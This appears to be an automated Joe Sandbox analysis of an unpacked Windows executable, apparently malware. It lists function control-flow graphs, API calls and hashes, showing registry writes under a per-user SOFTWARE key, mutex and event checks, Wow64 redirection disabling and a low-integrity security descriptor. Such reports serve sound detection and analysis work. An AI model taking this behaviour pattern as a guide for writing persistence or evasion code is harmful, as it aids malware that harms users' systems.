                          • Opcode ID: b5bd5c43134f5c68d2434f6ff5daeb3a02a4d9e06ca0d3bb7c8f35eac5b00b71
                          • Instruction ID: e96b8822e26b136014f346bef2b24364fa773f38e8d30bd51aa002ba671eac81
                          • Opcode Fuzzy Hash: b5bd5c43134f5c68d2434f6ff5daeb3a02a4d9e06ca0d3bb7c8f35eac5b00b71
                          • Instruction Fuzzy Hash: 7641FA71A103186AD720EB609C46FE77338AF84B00F4449A9B608E11C1FFB99AD4CF99

                          Control-flow Graph

                          control_flow_graph 668 406bc0-406c12 call 4245f0 672 406ce6 668->672 673 406c18-406c3b call 41d650 668->673 674 406ce8-406ceb 672->674 673->672 677 406c41-406c81 call 42466a RegOpenKeyExW 673->677 680 406c83-406ca9 RegSetValueExW 677->680 681 406cd9-406cdf 677->681 682 406cab-406cca LocalFree 680->682 683 406ccc-406cd2 680->683 681->672 682->674 683->681
                          APIs
                          • _memset.LIBCMT ref: 00406BF4
                            • Part of subcall function 0041D650: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00406C2B,?,00000000), ref: 0041D66C
                            • Part of subcall function 0041D650: GetFileSize.KERNEL32(000000FF,00000000,?,00406C2B,?), ref: 0041D681
                            • Part of subcall function 0041D650: LocalAlloc.KERNELBASE(00000040,000000FF,?,00406C2B), ref: 0041D696
                            • Part of subcall function 0041D650: ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 0041D6B7
                            • Part of subcall function 0041D650: CloseHandle.KERNELBASE(000000FF), ref: 0041D6CD
                          • __snwprintf.LIBCMT ref: 00406C57
                          • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00000102,?), ref: 00406C79
                          • RegSetValueExW.KERNELBASE(?,0047C0C8,00000000,00000003,00000000,00000000), ref: 00406CA1
                          • LocalFree.KERNELBASE(00000000), ref: 00406CBF
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleOpenReadSizeValue__snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 1138034345-297323700
                          • Opcode ID: f19c92ff1a245698797063612a0a0abab841d21ab3079ac34653b2421a43fb35
                          • Instruction ID: 4dbb56e6917a1da8e171bb8894cbc70e332e4860116f3715e570d109d2154552
                          • Opcode Fuzzy Hash: f19c92ff1a245698797063612a0a0abab841d21ab3079ac34653b2421a43fb35
                          • Instruction Fuzzy Hash: 7921A0B5A40318ABE720DB60DC4DFEA7338FB54700F4085A9E20DA6181E7B89AC4CF58

                          Control-flow Graph

                          control_flow_graph 685 41d650-41d679 CreateFileW 686 41d6f4 685->686 687 41d67b-41d68e GetFileSize 685->687 690 41d6f6-41d6f9 686->690 688 41d690-41d6a3 LocalAlloc 687->688 689 41d6ea-41d6ee CloseHandle 687->689 688->689 691 41d6a5-41d6bf ReadFile 688->691 689->686 692 41d6c1-41d6c7 691->692 693 41d6e0-41d6e4 LocalFree 691->693 692->693 694 41d6c9-41d6de CloseHandle 692->694 693->689 694->690
                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00406C2B,?,00000000), ref: 0041D66C
                          • GetFileSize.KERNEL32(000000FF,00000000,?,00406C2B,?), ref: 0041D681
                          • LocalAlloc.KERNELBASE(00000040,000000FF,?,00406C2B), ref: 0041D696
                          • ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 0041D6B7
                          • CloseHandle.KERNELBASE(000000FF), ref: 0041D6CD
                          • LocalFree.KERNEL32(00000000), ref: 0041D6E4
                          • CloseHandle.KERNEL32(000000FF,?,00406C2B), ref: 0041D6EE
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                          • String ID:
                          • API String ID: 2550598358-0
                          • Opcode ID: 258461c174a5af7792d2e170b3a5b610d5ba3921d79e7e063af4c8645c32e7f3
                          • Instruction ID: b85e8838005ae7857ce374d04d39e8da710c2da74ff1ddd55a270a0ed82ccddf
                          • Opcode Fuzzy Hash: 258461c174a5af7792d2e170b3a5b610d5ba3921d79e7e063af4c8645c32e7f3
                          • Instruction Fuzzy Hash: C9210875E00208FBDB14DFE4D898FDEB778EB88711F108599F629A72D0D634AA41CB58

                          Control-flow Graph

                          control_flow_graph 695 406ae0-406b1e call 4245f0 699 406b24-406b64 call 42466a 695->699 700 406bba 695->700 699->700 705 406b66-406b97 lstrlenW RegSetValueExW 699->705 701 406bbc-406bbf 700->701 706 406b99-406bab 705->706 707 406bad-406bb3 705->707 706->701 707->700
                          APIs
                          • _memset.LIBCMT ref: 00406B00
                          • __snwprintf.LIBCMT ref: 00406B3A
                          • lstrlenW.KERNEL32(?), ref: 00406B6D
                          • RegSetValueExW.KERNELBASE(?,0047C1B2,00000000,00000001,?,00000002), ref: 00406B8F
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value__snwprintf_memsetlstrlen
                          • String ID: SOFTWARE\%s
                          • API String ID: 4060651786-297323700
                          • Opcode ID: cf8dcb7eb7b22e55080df15b51e923374bd852b0bc5fca449b6a78fafd7c5703
                          • Instruction ID: fbcec564c88f7f5d5d308845b23355da71e4b7c2306ae5adb6ae419ea5acf669
                          • Opcode Fuzzy Hash: cf8dcb7eb7b22e55080df15b51e923374bd852b0bc5fca449b6a78fafd7c5703
                          • Instruction Fuzzy Hash: 9F11B4B5A003146BDB20DB60DC4DFE73338EB44700F4042A9B61DE61C2EAB49A848B59

                          Control-flow Graph

                          control_flow_graph 709 407fe0-40802e call 42466a RegCreateKeyExW 712 408030-408032 709->712 713 408034-40805c RegCloseKey call 4245f0 call 4080a0 709->713 714 408095-408098 712->714 719 408090 713->719 720 40805e-408080 call 408150 713->720 719->714 724 408085-40808a 720->724 724->719 725 40808c-40808e 724->725 725->714
                          APIs
                          • __snwprintf.LIBCMT ref: 00407FFF
                          • RegCreateKeyExW.KERNELBASE(80000001,?,00000000,00000000,00000000,000F013F,00000000,00401578,00000000), ref: 00408026
                          • RegCloseKey.KERNELBASE(00401578), ref: 00408038
                          • _memset.LIBCMT ref: 00408046
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreate__snwprintf_memset
                          • String ID: SOFTWARE\%s
                          • API String ID: 2176588963-297323700
                          • Opcode ID: 641c71ac9784cb3a57ab2943aa0143da861c9ce0e151c16bc0d66715283b04a1
                          • Instruction ID: d89a81bad2e92da19c4e3732ea73f8e1d8734e7b63bb46cc24fbd9d7b5bb6ae8
                          • Opcode Fuzzy Hash: 641c71ac9784cb3a57ab2943aa0143da861c9ce0e151c16bc0d66715283b04a1
                          • Instruction Fuzzy Hash: 8211A771A40209B6EB10EBB09D4AFFB732CAB14704F00097DB749E50C1FEB9A648C799

                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: _malloc
                          • String ID: LdrGetProcedureAddress
                          • API String ID: 1579825452-3058439150
                          • Opcode ID: e34e06494e395cee6efe99d20ff6183dd7e3cf5601c7517009c8d8f59f7a8588
                          • Instruction ID: dab4a983c6c40b0aff8208c0c8e888a8bc771f5e1fbc1f9c5a4fb952750aab3a
                          • Opcode Fuzzy Hash: e34e06494e395cee6efe99d20ff6183dd7e3cf5601c7517009c8d8f59f7a8588
                          • Instruction Fuzzy Hash: 9FA136B1D00218DBEB24EB98CC95BEEB7B5EB48304F1482ADE00677281D7396E85CF55

                          Control-flow Graph

                          control_flow_graph 791 4080a0-4080e6 call 42466a RegOpenKeyExW 794 4080e8-408119 RegGetValueW 791->794 795 40813c 791->795 796 40811b-40812a 794->796 797 40812e-40813a 794->797 798 40813e-408141 795->798 796->798 797->798
                          APIs
                          • __snwprintf.LIBCMT ref: 004080BF
                          • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,000F013F,?), ref: 004080DE
                          • RegGetValueW.KERNELBASE(?,?,0047BD20,00000008,00000000,00408057,0000000C), ref: 00408111
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: OpenValue__snwprintf
                          • String ID: SOFTWARE\%s
                          • API String ID: 999282410-297323700
                          • Opcode ID: 9d10d6697fe3a29f9e006c8e23d17be86a7ca428fbc77320804d6aac45eef5a5
                          • Instruction ID: 70a00890e79d645c898b447a2cffb9fe1ff2796eb1a97796f0715af71e561167
                          • Opcode Fuzzy Hash: 9d10d6697fe3a29f9e006c8e23d17be86a7ca428fbc77320804d6aac45eef5a5
                          • Instruction Fuzzy Hash: 77019675704308BBD720DBA0DD49FEA7378FF44700F5045A9B64DE6180E7B99A44DB94

                          Control-flow Graph

                          control_flow_graph 801 408150-408196 call 42466a RegOpenKeyExW 804 408198-4081b3 RegSetValueExW 801->804 805 4081cd 801->805 806 4081c3-4081c6 804->806 807 4081b5-4081c1 804->807 808 4081d2-4081d5 805->808 806->805 807->808
                          APIs
                          • __snwprintf.LIBCMT ref: 0040816F
                          • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,000F013F,?), ref: 0040818E
                          • RegSetValueExW.KERNELBASE(?,0047BD20,00000000,00000003,00408085,0000000C), ref: 004081AB
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: OpenValue__snwprintf
                          • String ID: SOFTWARE\%s
                          • API String ID: 999282410-297323700
                          • Opcode ID: 6d3a57c83b3b829178234cc15c44f6c33726e272421d2e346b05e20375fec168
                          • Instruction ID: aed4c7d27855a0ff0e38af9d29d5558bb421efdde5d6169d4f27df16ae01b2c2
                          • Opcode Fuzzy Hash: 6d3a57c83b3b829178234cc15c44f6c33726e272421d2e346b05e20375fec168
                          • Instruction Fuzzy Hash: F4018675B44308BBE710DBA0DD4AFAB7328EB44B40F504579B609AA1C0D6B9AA449B98

                          Control-flow Graph

                          control_flow_graph 810 40ca60-40ca7b 812 40ca81-40ca95 LocalAlloc 810->812 813 40cb4f 810->813 814 40cb45-40cb48 812->814 815 40ca9b-40cac2 812->815 816 40cb51-40cb54 813->816 814->813 818 40cac4-40cad0 call 40cf50 815->818 819 40cb3b-40cb3e 815->819 818->819 822 40cad2-40caf7 CreateDirectoryW 818->822 819->814 823 40cb06-40cb29 822->823 824 40caf9-40cb04 822->824 823->816 824->823 827 40cb2b-40cb2f 824->827 827->819 829 40cb31-40cb34 827->829 829->819
                          APIs
                          • LocalAlloc.KERNELBASE(00000040,0000FFFE,?,?,?,?,004015D2,00473900), ref: 0040CA88
                            • Part of subcall function 0040CF50: _memset.LIBCMT ref: 0040CFB3
                          • CreateDirectoryW.KERNELBASE(?,0000000C), ref: 0040CAEE
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocCreateDirectoryLocal_memset
                          • String ID: %s\%s
                          • API String ID: 2132535065-4073750446
                          • Opcode ID: d3d2b31eebb722a1a81289f5ae57c4f4aaf94c55dce4e1f5439fb6196ee5bff7
                          • Instruction ID: 4bfe5e81821697f294c0e6658054cd858778d5f0b8e1fa09720da18102415c62
                          • Opcode Fuzzy Hash: d3d2b31eebb722a1a81289f5ae57c4f4aaf94c55dce4e1f5439fb6196ee5bff7
                          • Instruction Fuzzy Hash: D6214174904208EBDB14DFE4EC89BAE7779FF48701F504575F605A2290C778AA84CB59

                          Control-flow Graph

                          control_flow_graph 831 41d590-41d5ce ConvertStringSecurityDescriptorToSecurityDescriptorW 832 41d5d0-41d5e8 831->832 833 41d60f-41d612 831->833 835 41d605-41d609 LocalFree 832->835 836 41d5ea-41d5fb 832->836 835->833 837 41d602 836->837 837->835
                          APIs
                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,00000000,00000000), ref: 0041D5C6
                          • LocalFree.KERNEL32(00000000), ref: 0041D609
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: DescriptorSecurity$ConvertFreeLocalString
                          • String ID: S:(ML;;NW;;;LW)
                          • API String ID: 3326902457-495562761
                          • Opcode ID: 79222ebb5228f6e4e3b2dd9fb378911f885dc9ee49feef9d9fc5a7ce2118e8ff
                          • Instruction ID: c7c91e79f79da7d65a0ee90aa3ae02f9d2027fb2d3caa575ff1c77d4af20dbca
                          • Opcode Fuzzy Hash: 79222ebb5228f6e4e3b2dd9fb378911f885dc9ee49feef9d9fc5a7ce2118e8ff
                          • Instruction Fuzzy Hash: C301DAB5A40209ABEB10DFD0CD59FEFB7B8BB48700F104559E605AA2C0D7B5AA44CBA5
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be3e56241cb29c3850425ed2d43413ef6fe304864ee02a70e677b39d173f0d9b
                          • Instruction ID: 6066d2bbd51ae5fa476b167245d919cb16194c17d4b571326d94cd7ea5d6c210
                          • Opcode Fuzzy Hash: be3e56241cb29c3850425ed2d43413ef6fe304864ee02a70e677b39d173f0d9b
                          • Instruction Fuzzy Hash: 69519AA580E3C04FD70387B499A96903FB0AE27250B0E45EBC4C5DF1B3D26C5D5AD32A

                          Control-flow Graph

                          control_flow_graph 1130 4018f3-4018fc 1131 401902-40190e 1130->1131 1132 401c02 1131->1132 1133 401914-40191b 1131->1133 1138 401c07-401c13 call 40c610 1132->1138 1139 4018e7-4018f1 1132->1139 1135 401950-40198c call 410d50 1133->1135 1136 40191d-40194e call 40d7f0 1133->1136 1144 401992-401999 1135->1144 1136->1144 1148 401c24-401c2c call 41d2c0 1138->1148 1149 401c15-401c1d 1138->1149 1139->1131 1146 401bf2 1144->1146 1147 40199f-4019a6 1144->1147 1156 401bfd 1146->1156 1150 401b32-401b83 1147->1150 1151 4019ac-4019ba 1147->1151 1157 401c3b-401c46 ExitProcess 1148->1157 1158 401c2e-401c35 Wow64DisableWow64FsRedirection 1148->1158 1149->1148 1169 401b85-401b8c 1150->1169 1170 401b8e-401b95 1150->1170 1154 401a2a-401a38 1151->1154 1155 4019bc-4019d0 1151->1155 1160 401aa9-401ab7 1154->1160 1161 401a3a-401a4e 1154->1161 1155->1154 1167 4019d2-4019f1 1155->1167 1156->1132 1158->1157 1162 401b28 1160->1162 1163 401ab9-401acd 1160->1163 1161->1160 1171 401a50-401a6f OpenMutexW 1161->1171 1162->1138 1163->1162 1172 401acf-401aee 1163->1172 1180 4019f3-401a06 1167->1180 1181 401a14-401a1b 1167->1181 1169->1132 1173 401ba6-401bad 1170->1173 1174 401b97-401b9f 1170->1174 1175 401a71-401a85 1171->1175 1176 401a93-401a9a 1171->1176 1189 401af0-401b04 1172->1189 1190 401b12-401b19 1172->1190 1178 401bbc-401bc3 1173->1178 1179 401baf-401bb5 1173->1179 1174->1173 1191 401a91 1175->1191 1192 401a87 1175->1192 1176->1160 1182 401a9c-401aa2 1176->1182 1186 401bd2-401bf0 call 4245f0 1178->1186 1187 401bc5-401bcb 1178->1187 1179->1178 1196 401a12 1180->1196 1197 401a08 1180->1197 1181->1154 1183 401a1d-401a23 1181->1183 1182->1160 1183->1154 1186->1156 1187->1186 1200 401b10 1189->1200 1201 401b06 1189->1201 1190->1162 1195 401b1b-401b21 1190->1195 1191->1161 1192->1138 1195->1162 1196->1155 1197->1138 1200->1163 1201->1138
                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00401C35
                          • ExitProcess.KERNEL32(00000000), ref: 00401C3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wow64$DisableExitProcessRedirection
                          • String ID:
                          • API String ID: 3835450656-0
                          • Opcode ID: 6fa488a04dd16c96343786a33c2b62a001ae4c619b394e2a8cad49dc75fed1c5
                          • Instruction ID: 91adefb99382e5ad79ee56fd4990a73d0c6f1281317b32aedbce968e10b59d6e
                          • Opcode Fuzzy Hash: 6fa488a04dd16c96343786a33c2b62a001ae4c619b394e2a8cad49dc75fed1c5
                          • Instruction Fuzzy Hash: 1C214F70A041149BDB34DF64DD49B997376FB88315F1046BAE109722A0C7799ED4CF19

                          Control-flow Graph

                          control_flow_graph 1202 401a0d-401c13 call 40c610 1206 401c24-401c2c call 41d2c0 1202->1206 1207 401c15-401c1d 1202->1207 1210 401c3b-401c46 ExitProcess 1206->1210 1211 401c2e-401c35 Wow64DisableWow64FsRedirection 1206->1211 1207->1206 1211->1210
                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00401C35
                          • ExitProcess.KERNEL32(00000000), ref: 00401C3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wow64$DisableExitProcessRedirection
                          • String ID:
                          • API String ID: 3835450656-0
                          • Opcode ID: c10fe2623213f26a604cb30112e900d5acca478250b59268a5f20ae2fd1e4891
                          • Instruction ID: a833c8687c560b03d1da3dd21e147f64b3a6ec987c87aaf55bb09993553c3c6f
                          • Opcode Fuzzy Hash: c10fe2623213f26a604cb30112e900d5acca478250b59268a5f20ae2fd1e4891
                          • Instruction Fuzzy Hash: 59E0127444811097DA2CABB0DD89AA97334FB46326F104B7BF225601F0C639D8C48B1D

                          Control-flow Graph

                          control_flow_graph 1212 401a8c-401c13 call 40c610 1216 401c24-401c2c call 41d2c0 1212->1216 1217 401c15-401c1d 1212->1217 1220 401c3b-401c46 ExitProcess 1216->1220 1221 401c2e-401c35 Wow64DisableWow64FsRedirection 1216->1221 1217->1216 1221->1220
                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00401C35
                          • ExitProcess.KERNEL32(00000000), ref: 00401C3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wow64$DisableExitProcessRedirection
                          • String ID:
                          • API String ID: 3835450656-0
                          • Opcode ID: 974eadbcea44a21995540378ed3c8b3d6bbab80263cfff2f25aee7855fb1c44f
                          • Instruction ID: a833c8687c560b03d1da3dd21e147f64b3a6ec987c87aaf55bb09993553c3c6f
                          • Opcode Fuzzy Hash: 974eadbcea44a21995540378ed3c8b3d6bbab80263cfff2f25aee7855fb1c44f
                          • Instruction Fuzzy Hash: 59E0127444811097DA2CABB0DD89AA97334FB46326F104B7BF225601F0C639D8C48B1D
                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00401C35
                          • ExitProcess.KERNEL32(00000000), ref: 00401C3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wow64$DisableExitProcessRedirection
                          • String ID:
                          • API String ID: 3835450656-0
                          • Opcode ID: 04e9c374a8f3f31d335a5705728d381ed82ce052ebd02ed657c38af5408640fb
                          • Instruction ID: a833c8687c560b03d1da3dd21e147f64b3a6ec987c87aaf55bb09993553c3c6f
                          • Opcode Fuzzy Hash: 04e9c374a8f3f31d335a5705728d381ed82ce052ebd02ed657c38af5408640fb
                          • Instruction Fuzzy Hash: 59E0127444811097DA2CABB0DD89AA97334FB46326F104B7BF225601F0C639D8C48B1D
                          APIs
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00401C35
                          • ExitProcess.KERNEL32(00000000), ref: 00401C3D
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wow64$DisableExitProcessRedirection
                          • String ID:
                          • API String ID: 3835450656-0
                          • Opcode ID: 3cbb4a3e08bbc584f3317af269305acf80d860c60903eaee8eb92d9b2fa1221d
                          • Instruction ID: a833c8687c560b03d1da3dd21e147f64b3a6ec987c87aaf55bb09993553c3c6f
                          • Opcode Fuzzy Hash: 3cbb4a3e08bbc584f3317af269305acf80d860c60903eaee8eb92d9b2fa1221d
                          • Instruction Fuzzy Hash: 59E0127444811097DA2CABB0DD89AA97334FB46326F104B7BF225601F0C639D8C48B1D
                          APIs
                            • Part of subcall function 00419140: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 0041914E
                          • ExitProcess.KERNEL32 ref: 0040103B
                          • _memset.LIBCMT ref: 00401058
                          • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 004010A0
                          • CreateMutexW.KERNELBASE(0000000C,00000000,0047B18C), ref: 004010D2
                          • OpenEventW.KERNEL32(00100002,00000000,004797F4), ref: 00401116
                          • ExitProcess.KERNEL32 ref: 00401197
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: ExitProcessWow64$CreateDisableEventLibraryLoadMutexOpenRedirection_memset
                          • String ID:
                          • API String ID: 2030883397-0
                          • Opcode ID: 7bbfeb0b8c1a50f57962939504400496336a30acb12e84be92efcac8acad4660
                          • Instruction ID: a26e70dcc84e3b937f3fed492939267a4b6412feebe7921106151685511d26c9
                          • Opcode Fuzzy Hash: 7bbfeb0b8c1a50f57962939504400496336a30acb12e84be92efcac8acad4660
                          • Instruction Fuzzy Hash: B0E086F49683C05FD201AF71BD556413B347F11281F440075D4D58B5B2D239A6C59759
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: _strlen
                          • String ID:
                          • API String ID: 4218353326-0
                          • Opcode ID: 4a78252a3d50c4f49edb000d43e48ae1fde89e471823e3d2fdb448f0ac22ba3b
                          • Instruction ID: 57871f08ca78a2d2cb45435a79d1a0d85353595e702abf4ec90e96327f8cbcb3
                          • Opcode Fuzzy Hash: 4a78252a3d50c4f49edb000d43e48ae1fde89e471823e3d2fdb448f0ac22ba3b
                          • Instruction Fuzzy Hash: 5F21E9B0924209AFDB04DFA4D841BAF77F5FB48314F00817EE509E7291E7745A98CB99
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: CreateThreadUser
                          • String ID:
                          • API String ID: 1531140918-0
                          • Opcode ID: 9d825d32468024121c3756d526faa31a86c33974238a552c6b200037977dcc1c
                          • Instruction ID: 81813d2535c41125071dfe0462ffbd7027fcf53a36177536da3d9b1b825c0a0e
                          • Opcode Fuzzy Hash: 9d825d32468024121c3756d526faa31a86c33974238a552c6b200037977dcc1c
                          • Instruction Fuzzy Hash: 39F04F31918D1D9FCF15BB68D805DAEBBB1FB54310F100616E405F3184DA31E4218F85
                          APIs
                          • CloseHandle.KERNEL32(?), ref: 00417E07
                          • CloseHandle.KERNEL32(?), ref: 00417E39
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417E57
                          • CreateThread.KERNEL32(00000000,00000000,?,-0047C9B0,00000004,00000000), ref: 00417E8C
                          • ResumeThread.KERNEL32(00000000), ref: 00417ECC
                          • CloseHandle.KERNEL32(00000000), ref: 00417EE5
                          • CloseHandle.KERNEL32(00000000), ref: 00417EEF
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00417F39
                          • CloseHandle.KERNEL32(?), ref: 00417F71
                          • CloseHandle.KERNEL32(?), ref: 00417FA3
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00417FC1
                          • CreateThread.KERNEL32(00000000,00000000,?,-0047C9B0,00000004,00000000), ref: 00417FF5
                          • ResumeThread.KERNEL32(00000000), ref: 00418035
                          • ___crtGetLocaleInfoEx.LIBCMTD ref: 004181C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: CloseHandle$CreateThread$EventResume$InfoLocaleObjectSingleWait___crt
                          • String ID: d
                          • API String ID: 3049167170-2564639436
                          • Opcode ID: 2f041d12a087f10d211d8f111ce1b92c028ea9d059dddc6fbca995de52eac04e
                          • Instruction ID: ec46aa64586cefb44bc121c17000e6170b7d0ff1991cb480dba2527a1796f028
                          • Opcode Fuzzy Hash: 2f041d12a087f10d211d8f111ce1b92c028ea9d059dddc6fbca995de52eac04e
                          • Instruction Fuzzy Hash: 573243B1A04109DFDB18CF94C888BEEBBB1FB44304F14856EE615AB3D1DB799885CB58
                          APIs
                          • OpenEventW.KERNEL32(00100000,00000000,004797F4), ref: 00422112
                          • OpenMutexW.KERNEL32(00100000,00000000,00479842), ref: 00422141
                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 004221BA
                          • CloseHandle.KERNEL32(?), ref: 00422604
                          • ReleaseMutex.KERNEL32(00000000), ref: 0042261E
                          • CloseHandle.KERNEL32(00000000), ref: 00422628
                          • CloseHandle.KERNEL32(00000000), ref: 00422638
                          • CloseHandle.KERNEL32(00000000), ref: 00422642
                          Memory Dump Source
                          • Source File: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_uncrypted.jbxd
                          • API ID: CloseHandle$EventMutexOpen$CreateRelease
                          • String ID:
                          • API String ID: 3541121777-0
                          • Opcode ID: e6e5146e5d674d16ba72c7733c1277cd3e0aff2f925dd94ed7c9b805ca73fbfa
                          • Instruction ID: 4b62354427e36294d1d22f0316a9effc27a50df354362d9b8fbe57eabd4b792d
                          • Opcode Fuzzy Hash: e6e5146e5d674d16ba72c7733c1277cd3e0aff2f925dd94ed7c9b805ca73fbfa
                          • Instruction Fuzzy Hash: 37E14D70B00214FFDB149FA4EE4DBAE7771BB48315F50852AE605A62E0C7F859C8CB59
                          APIs
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 0041DB85
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0041DB9D
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0041DBD2
                          • FindFirstFileW.KERNEL32(00000000,?), ref: 0041DBF0
                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041DC0F
                          • lstrcmpW.KERNEL32(?,0043969C), ref: 0041DC2D
                          • lstrcmpW.KERNEL32(?,004396A0), ref: 0041DC43
                          • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 0041DC68
